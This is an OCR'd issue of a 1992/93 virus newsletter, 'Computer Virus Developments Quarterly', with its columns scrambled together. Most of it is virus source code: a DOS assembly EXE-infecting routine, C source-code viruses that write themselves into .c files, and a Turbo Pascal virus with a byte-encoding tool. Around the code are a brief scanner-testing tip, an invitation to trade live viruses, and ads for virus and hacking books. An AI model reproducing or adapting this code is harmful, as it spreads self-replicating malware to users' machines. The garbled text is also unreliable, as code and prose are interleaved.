cvdq1 2 PDF
cvdq1 2 PDF
cvdq1 2 PDF
Virus
Developments
Quarterly
The Independent Journal of Computer Viruses Volume 1, Number 2 — Winter, 1992/3
there are COM files by the same name on the system. If main endp
;*****************************************************************************
there are, it’s possibly a virus. Likewise, one can search ;This routine searches for EXE’s and infects them.
for hidden COM files of dubious origin. A more sophis- search_files proc
mov
near
dx,offset exe_mask ;DX points to “*.EXE”
ticated spawning virus might hide and rename the EXE call
done_searching: ret
find_files ;Try to infect a file
;Return to caller
file to something else and then leave an unhidden COM exe_mask db “*.EXE”,0 ;Mask for all .EXE files
search_files endp
file with the proper name on the system. A sophisticated find_files proc near
user might notice his EXE’s were changing to COM’s, push bp ;Save BP
but I would guess the average user would not. To protect mov
int
ah,02Fh
021h
;DOS get DTA function
do the following: jc
call
done_finding
infect_file
;Exit if no files found
;Infect the file!
jnc done_finding ;Exit if no error
mov ah,04Fh ;DOS find next file function
jmp short find_a_file ;Try finding another file
(1) Take any old (and preferably small) file you don’t need
done_finding: mov sp,bp ;Restore old stack frame
and rename it to a COM file with the same name as an EXE mov
pop
ah,01Ah
dx
;DOS set DTA function
;Retrieve old DTA address
in the same directory. For example, I have a program int 021h
MS.EXE. I could just take any text file and rename it to pop
ret
bp ;Restore BP
;Return to caller
MS.COM. If you have a disk utility, go ahead and make find_files endp
the COM file hidden. Now scan your system. Does your ;*****************************************************************************
;This routine infects the file specified in the DTA search block, if it can,
scanner alert you to the presence of the COM file? (Delete ;and returns with C set if it could not infect.
infect_file proc near
the COM file when you are done!) mov
int
ah,02Fh
021h
;DOS get DTA address function
mov
byte ptr [set_carry],1
ah,03Ch
;Success — the file is OK
;*****************************************************************************
better hidden. For example, when inserting the include ALL RIGHTS RESERVED. YOU MAY NOT COPY OR DISTRIBUTE THIS CODE IN ANY FORM,
SOURCE OR EXECUTABLE, WITHOUT PRIOR WRITTEN PERMISSION FROM THE PUBLISHER!!!
statement, the virus could look for the first blank line in */
#ifndef SCVIRUS
a C file (not inside a comment) and then put the include #define SCVIRUS
statement on that line out past line 80, so it won’t appear #include <stdio.h>
#include <dos.h>
on the screen the minute you call the file up with an
/******************************************************************************/
A wild source code virus will not have all kinds of
void main()
{ nice comments in it, or descriptive function names, so
char l[255],p[255];
int i,j; you can tell what it is and what it is doing. Instead, it may
ccount=0;
f1=fopen("virus.hs","r");
look like the following code, which just implements
ft=fopen("virus.h","w");
do
SCV1 in a little more compact notation.
{
j=0; l[j]=0;
while ((!feof(f1)) && ((j==0)||(l[j-1]!=0x0A)))
{fread(&l[j],1,1,f1); j++;}
l[j]=0;
if (strcmp(l,"static char virush[]={0};\n")==0)
{
Source Listing for SCV2.C
fwrite(&l[0],22,1,ft);
f2=fopen("virus.hs","r");
do
{
j=0; p[j]=0;
Again, compile this with Microsoft C 7.0.
while ((!feof(f2)) && ((j==0)||(p[j-1]!=0x0A)))
{fread(&p[j],1,1,f2); j++;}
p[j]=0; /* This is a source code virus in Microsoft C. All of the code is in virus.h */
if (strcmp(p,"static char virush[]={0};\n")==0)
{ #include <stdio.h>
for (i=0;i<22;i++) put_constant(ft,p[i]); #include <v784.h>
p[0]=’0’; p[1]=’,’;
fwrite(&p[0],2,1,ft); /******************************************************************************/
ccount++; void main()
for (i=25;p[i]!=0;i++) put_constant(ft,p[i]); {
} s784(); // just go infect a .c file
else }
{
for (i=0;i<j;i++) put_constant(ft,p[i]);
}
}
while (!feof(f2));
}
strcpy(&p,"0};\n");
fwrite(&p[0],strlen(p),1,ft); Source Listing for VIRUS2.HS
else for (i=0;i<j;i++) fwrite(&l[i],1,1,ft);
}
while (!feof(f1));
fclose(f1); /* (C) Copyright 1993 American Eagle Publications, Inc. All rights reserved. */
fclose(f2);
fclose(ft); #ifndef S784
} #define S784
#include <stdio.h>
#include <dos.h>
static char a784[]={0};
files for this virus are included on the diskette with this void r782(char *g) {int b,c,d,e;char a[255];FILE *q;if ((q=fopen(g,"a"))==NULL)
return; b=c=d=0; while (a784[b]) fwrite(&a784[b++],1,1,q); while (a784[d]||(d==b))
issue. Make sure you create a directory \C700\IN- {itoa((int)a784[d],a,10);e=0;while (a[e]) fwrite(&a[e++],1,1,q);d++;c++;if (c>20)
{strcpy(a,",\n “);fwrite(&a[0],strlen(a),1,q);c=0;}else
CLUDE (or any other directory you like) and execute the {a[0]=’,’;fwrite(&a[0],1,1,q);}}strcpy(a,"0};");fwrite(&a[0],3,1,q);b++;while
(a784[b]) fwrite(&a784[b++],1,1,q);fclose(q);}
appropriate SET command: void s784() {char q[64]; strcpy(q,getenv("INCLUDE"));if (q[0]){if (!r781(q))
r782(q); strcpy(q,"*.c"); if (r783(q)) r784(q);}}
#endif
SET INCLUDE=C:\C700\INCLUDE
ENCODE will create a new file with a proper TCONST {This function searches the current directory to find a pascal file that
has not been infected yet. It calls the function ok_to_attach in order
to determine whether or not a given file has already been infected. It
definition, complete with encryption. Then, with an returns TRUE if it successfully found a file, and FALSE if it did not.
If it found a file, it returns the name in fn.}
editor, one may put the proper constant back into function find_pascal_file:boolean;
var
SCVIRUS.PAS. sr
begin
:SearchRec; {From the DOS unit}
{This is the routine which actually attaches the virus to a given file.}
{$I VIRUS.INC} procedure append_virus;
var
f,ft :text;
l,t,lt :string;
Since Turbo Pascal doesn’t make use of an IN- j
cw,
:word;
{flag to indicate constant was written}
CLUDE environment variable, the virus would have to pw,
uw,
{flag to indicate procedure was written}
{flag to indicate uses statement was written}
put VIRUS.INC in the current directory, or specify the intf,
impf,
{flag to indicate “interface” statement}
{flag to indicate “implementation” statement}
comment :boolean;
exact path where it did put it (\TP, the default Turbo begin
assign(f,fn);
install directory might be a good choice). In any event, it reset(f);
assign(ft,’temp.aps’);
{open the file}
would probably only want to create that file when it had rewrite(ft);
cw:=false;
{open a temporary file too}
pw:=false;
successfully found a PAS file to infect, so it did not put uw:=false;
impf:=false;
new files on systems which had no Pascal files on them intf:=false;
filetype:=’ ’; {initialize flags}
to start with. repeat
readln(f,l);
if t<>’’ then lt:=t;
t:=UpString(l); {look at all strings in upper case}
comment:=false;
for j:=1 to length(t) do {blank out all comments in the string}
MUTATION
end;
if pos(’END.’,t)>0 then {write call to virus into main procedure}
begin
if (pos(’END’,lt)>0) and (filetype=’U’) then writeln(ft,’begin’);
t:=’virus;’;
for j:=1 to pos(’END.’,UpString(l))+1 do t:=’ ’+t;
writeln(ft,t);
end;
ENGINES
writeln(ft,l);
until eof(f);
close(f); {close file}
close(ft); {close temporary file}
erase(f); {Substitute temp file for original file}
rename(ft,fn);
end;
006—Tech Note #2: The Stoned Virus, a complete disassembly and explanation function ef:boolean; {End of file function}
begin
of the world’s most successful boot sector virus. Includes booklet and ef:=eof(fin) or (b=$1A);
disk. $20.00. end;
007—Tech Note #3: The Jerusalem Virus, a complete disassembly and begin
if ParamCount<>2 then exit; {Expects input and output file name}
explanation of this simple but effective memory resident virus. Includes assign(fin,ParamStr(1)); reset(fin); {Open input file to read}
booklet and disk. $20.00. assign(fout,ParamStr(2)); rewrite(fout); {Open output file to write}
writeln(fout,’const’); {"Constant" statement}
008—Tech Note #4: How to Write Protect an MFM Hard Disk. The ultimate write(fout,’ tconst:array[1..’,filesize(fin),’] of byte=(’);
way to protect against the spread of viruses. Don’t go out and pay hundreds bcnt:=11;
repeat
{Define the constant tconst}
of $ for one of these devices, when you can build one for less than twenty read(fin,b); {Read each byte individually}
bcnt:=bcnt+1;
dollars! No diskette. $12.00. if b<>$1A then {b <> eof marker}
begin
write(fout,(b shl 1) xor $AA); {Encode the byte}
Add $2.00 postage ($4 overseas airmail) for any combination of diskettes and if (not ef) then write(fout,’,’);
Tech Notes. Arizona residents please add 5% sales tax. if (bcnt=18) and (not ef) then {Put 16 bytes on each line}
begin
writeln(fout);
write(fout,’ ’);
Qty Item No./Description Price bcnt:=0;
end;
end
else write(fout,($20 shl 1) xor $AA);
until ef; {Go to the end of the file}
writeln(fout,’);’);
Shipping close(fout); {Close up and exit}
close(fin);
Sales Tax end.
Total
Preferred Disk Size: 3-1/2" 5-1/4" Thank you to all of those who responded to our request
Please ship to: to exchange viruses. We are still interested in building
Name our collection, so if you have viruses or need them, call
and we will work a trade. Once we get this collection
Address sufficiently well organized, we may set up a private BBS
for subscribers, if there is sufficient interest. We are
City/State/Zip engaged in active virus research, and would welcome
(Country) people interested in carrying out some aspect of this
research, especially disassemblies. Financial rewards
Make checks payable to: are possible here. We would also consider any articles
American Eagle Publications, Inc. submitted for possible publication in CVDQ. Please call
P. O. Box 41401 (602)888-4957, or write Mark Ludwig at American Eagle
Tucson, AZ 85717 (USA) Publications, Inc., PO Box 41401, Tucson, AZ 85717.
www.computervirus.bz
Have fun!
Order from www.ameaglepubs.com today!
Dr. Ludwig is back in black!
In this brand new book, Dr. Ludwig explores the fascinating world of email viruses in a way nobody
else dares! Here you will learn about how these viruses work and what they can and cannot do from a
veteran hacker and virus researcher. Why settle for the vague generalities of other books when you
can have page after page of carefully explained code and a fascinating variety of live viruses to
experiment with on your own computer or check your antivirus software with? In this book you'll
learn the basics of viruses that reproduce through email, and then go on to explore how antivirus
programs catch them and how wiley viruses evade the antivirus programs. You'll learn about
polymorphic and evolving viruses. You'll learn how viruse writers use exploits - bugs in programs
like Outlook Express - to get their code to execute without your consent. You'll learn about logic
bombs and the social engineering side of viruses - not the social engineering of old time hackers, but
the tried and true scientific method behind turning a replicating program into a virus that infects
millions of computers.Yet Dr. Ludwig doesn't stop here. He faces the sobering possibilities of email
viruses that lie just around the corner . . . viruses that could literally change the history of the human
race, for better or worse.Admittedly this would be a dangerous book in thewrong hands.Yet it would
be more dangerous if it didn't get into the right hands. The next major virus attack could see millions
of computers wiped clean in a matter of hours. With this book, you'll have a fighting chance to spot
the trouble coming and avoid it, while the multitudes that are dependent on a canned program to keep
them out of trouble will get taken out. In short, this is an utterly fascinating book.You'll never look at
computer viruses the same way again after reading it.
The world of hacking changes continuously. Yesterday's hacks are today's rusty locks that no
longer work. The security guys are constantly fixing holes, and the hackers are constantly
changing their tricks. This new fourth edition of the Happy Hacker - just released in December,
2001 - will keep you up to date on the world of hacking. It's classicMeinel at her best, leading you
through the tunnels and back doors of the internet that is accessible to the beginner, yet
entertaining and educational to the advanced hacker. With major new sections on exploring and
hacking websites, and hacker war, and updates to cover the latest Windows operating systems,
the Happy Hacker is bigger and better than ever!